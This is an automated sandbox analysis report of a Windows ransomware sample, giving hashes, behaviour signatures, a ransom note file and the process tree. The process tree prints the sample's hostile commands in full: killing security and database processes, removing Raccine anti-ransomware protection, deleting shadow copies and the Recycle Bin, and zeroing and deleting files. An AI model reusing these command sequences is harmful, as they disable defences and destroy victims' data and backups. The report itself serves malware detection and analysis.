Resubmissions

13-07-2024 09:54

240713-lxbx6swdmm 10

13-07-2024 09:50

240713-lvbvdsyapd 10

13-07-2024 09:46

240713-lr1dksyajd 10

Analysis

  • max time kernel
    844s
  • max time network
    845s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13-07-2024 09:50

General

  • Target

    8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c.exe

  • Size

    131KB

  • MD5

    807b3c16e4b836511f326750bd175189

  • SHA1

    b24792703c3f05e07a668b4c1b701799b7e6fb6b

  • SHA256

    8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c

  • SHA512

    844c26ecc56929ca444344d22265e6e02debe1713c99a732c80cbee3474852b48aa359567a1e3e78cc165441177dd9f8880b8213806d69aac0e8df4352cf969b

  • SSDEEP

    3072:KFk4WBCsljJ8lSATxHt2bFZQhdFC7UtrK:KFkNCstGwATxN2bkFC

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Renames multiple (72) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 48 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c.exe
    "C:\Users\Admin\AppData\Local\Temp\8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c.exe"
    1⤵
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2412
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1544
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:2892
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:2444
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:1896
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
          • Launches sc.exe
          PID:2876
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config SSDPSRV start= auto
          2⤵
          • Launches sc.exe
          PID:2748
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config FDResPub start= auto
          2⤵
          • Launches sc.exe
          PID:2720
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
          2⤵
            PID:2604
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config upnphost start= auto
            2⤵
            • Launches sc.exe
            PID:2856
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
            • Launches sc.exe
            PID:2684
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
            2⤵
            • Launches sc.exe
            PID:2620
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
            • Launches sc.exe
            PID:2652
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SstpSvc start= disabled
            2⤵
            • Launches sc.exe
            PID:2592
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2236
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM excel.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2320
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM firefoxconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM CNTAoSMgr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:372
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM agntsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:984
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1044
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:780
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlwriter.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2936
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1644
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2924
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tbirdconfig.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM steam.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2100
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqbcoreservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1296
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbeng50.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2344
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM encsvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2136
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM thebat64.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" IM thunderbird.exe /F
            2⤵
            • Kills process with taskkill
            PID:1652
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM isqlplussvc.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:932
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM dbsnmp.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3048
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocomm.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1628
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM onenote.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2324
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM xfssvccon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2364
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM infopath.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM PccNTMon.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2296
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mspub.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2992
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msaccess.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2892
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mbamtray.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2820
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM Ntrtscan.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3008
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM outlook.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2768
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM zoolz.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3004
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM tmlisten.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2668
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopservice.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2204
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocautoupds.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2640
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM msftesql.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2240
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM winword.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM ocssd.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2656
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM powerpnt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1720
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-nt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:444
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM oracle.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2904
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM wordpad.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2792
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mydesktopqos.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1060
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlagent.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1268
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM visio.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:616
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM mysqld-opt.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2580
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlbrowser.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1040
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM sqlservr.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1188
          • C:\Windows\SysWOW64\taskkill.exe
            "taskkill.exe" /IM synctime.exe /F
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:568
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3036
          • C:\Windows\SysWOW64\notepad.exe
            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
            2⤵
            • Opens file in notepad (likely ransom note)
            PID:1268
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
            2⤵
              PID:2476
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.7 -n 3
                3⤵
                • Runs ping.exe
                PID:2580
              • C:\Windows\SysWOW64\fsutil.exe
                fsutil file setZeroData offset=0 length=524288 “%s”
                3⤵
                  PID:2080
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\8dd283ca012e7a70a2673d2cc211c6a616ff23bc5bd3599a1da077ba946a044c.exe
                2⤵
                  PID:1964
                  • C:\Windows\SysWOW64\choice.exe
                    choice /C Y /N /D Y /T 3
                    3⤵
                      PID:2092
                • C:\Windows\system32\conhost.exe
                  \??\C:\Windows\system32\conhost.exe "7149373482052385470-1366384500-8044409091396844297-6482720841001367968-1830118096"
                  1⤵
                    PID:2620
                  • C:\Windows\system32\conhost.exe
                    \??\C:\Windows\system32\conhost.exe "-873311285-21287600545440800798800685151437190242146878390111145279601579426901"
                    1⤵
                      PID:2656

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

                      Filesize

                      31B

                      MD5

                      cf3290884ddc5d4c139e6c432cb76ab5

                      SHA1

                      e83ca94ba82dcf55dedb159b2373518531e1e342

                      SHA256

                      007c1d9f31f111fb85059e3ce2719a6b98e326e6657c2a3e12a75cf735dd8c07

                      SHA512

                      c79c2c671ac117f9a130fb7e6107f48c1a51cfd633583c2b64dc3c1b22bf386364fe44cda6264251cd307265afe624f505a130fc8510a9c1b121670e28293fb7

                    • C:\Users\Admin\Desktop\SubmitConvertTo.xlsx.ARAI

                      Filesize

                      11KB

                      MD5

                      645ffa1494f19a0aeaee1215589ba7f3

                      SHA1

                      df685a51b6fabad218a2ab95904106d0c81f89df

                      SHA256

                      cccb45a6759583849fb8ca6c8614942f7ac84364aa5a1897004dd3c813c0ee1a

                      SHA512

                      cf344bb8384556f4246bc2503d2fc69d7e24b211af0f1729bd756428325b1087b9be43b394f94a127e3e41e525c22fc3f71f39edb61175d5ede3af557d1feffa

                    • memory/1964-184-0x0000000076C30000-0x0000000076D2A000-memory.dmp

                      Filesize

                      1000KB

                    • memory/1964-183-0x0000000076D30000-0x0000000076E4F000-memory.dmp

                      Filesize

                      1.1MB

                    • memory/2412-0-0x000000007404E000-0x000000007404F000-memory.dmp

                      Filesize

                      4KB

                    • memory/2412-1-0x0000000001000000-0x0000000001026000-memory.dmp

                      Filesize

                      152KB

                    • memory/2412-2-0x0000000074040000-0x000000007472E000-memory.dmp

                      Filesize

                      6.9MB

                    • memory/2412-182-0x0000000074040000-0x000000007472E000-memory.dmp

                      Filesize

                      6.9MB